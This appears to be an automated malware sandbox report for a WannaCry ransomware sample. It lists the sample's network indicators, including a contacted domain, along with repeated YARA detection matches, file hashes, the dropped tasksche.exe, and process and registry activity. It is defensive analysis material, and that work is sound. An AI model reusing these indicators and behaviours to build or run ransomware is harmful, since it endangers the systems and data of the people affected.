Source: Joe Sandbox View	IP Address: 104.16.173.80 104.16.173.80
Source: Joe Sandbox View	IP Address: 104.16.173.80 104.16.173.80

Source: MSNRf9dZ63.exe	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, MSNRf9dZ63.exe, 00000001.00000002.254768785.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Source: MSNRf9dZ63.exe, 00000001.00000002.254650508.0000000000D09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
Source: MSNRf9dZ63.exe, 00000001.00000002.254593327.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0
Source: MSNRf9dZ63.exe, 00000001.00000002.252440796.000000000019C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
Source: MSNRf9dZ63.exe, 00000001.00000002.254790548.0000000000D34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.kryptoslogic.com

Source: unknown

DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

Spam, unwanted Advertisements and Ransom Demands

Detected Wannacry Ransomware

Source: C:\Windows\tasksche.exe

Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!

2_2_004014A6

Yara detected Wannacry ransomware

Source: Yara match	File source: MSNRf9dZ63.exe, type: SAMPLE
Source: Yara match	File source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.249857244.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.256150268.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.247075924.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.252492927.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSNRf9dZ63.exe PID: 4548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSNRf9dZ63.exe PID: 4348, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs

Source: MSNRf9dZ63.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: MSNRf9dZ63.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.MSNRf9dZ63.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.MSNRf9dZ63.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.MSNRf9dZ63.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000002.00000000.252768487.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.252602471.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000002.256240785.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000000.249931141.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000000.247147186.0000000000710000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

File created: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Windows\tasksche.exe	Code function: 2_2_00406C40	2_2_00406C40
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402A76	2_2_00402A76
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402E7E	2_2_00402E7E
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040350F	2_2_0040350F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00404C19	2_2_00404C19
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040541F	2_2_0040541F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00403797	2_2_00403797
Source: C:\Windows\tasksche.exe	Code function: 2_2_004043B7	2_2_004043B7
Source: C:\Windows\tasksche.exe	Code function: 2_2_004031BC	2_2_004031BC

Source: MSNRf9dZ63.exe	Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.0.dr	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: MSNRf9dZ63.exe	ReversingLabs: Detection: 96%
Source: MSNRf9dZ63.exe	Virustotal: Detection: 83%

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

File read: C:\Users\user\Desktop\MSNRf9dZ63.exe

Jump to behavior

Source: MSNRf9dZ63.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MSNRf9dZ63.exe C:\Users\user\Desktop\MSNRf9dZ63.exe
Source: unknown	Process created: C:\Users\user\Desktop\MSNRf9dZ63.exe C:\Users\user\Desktop\MSNRf9dZ63.exe -m security
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Users\user\Desktop\MSNRf9dZ63.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i	Jump to behavior

Source: C:\Users\user\Desktop\MSNRf9dZ63.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.rans.evad.winEXE@4/1@2/1

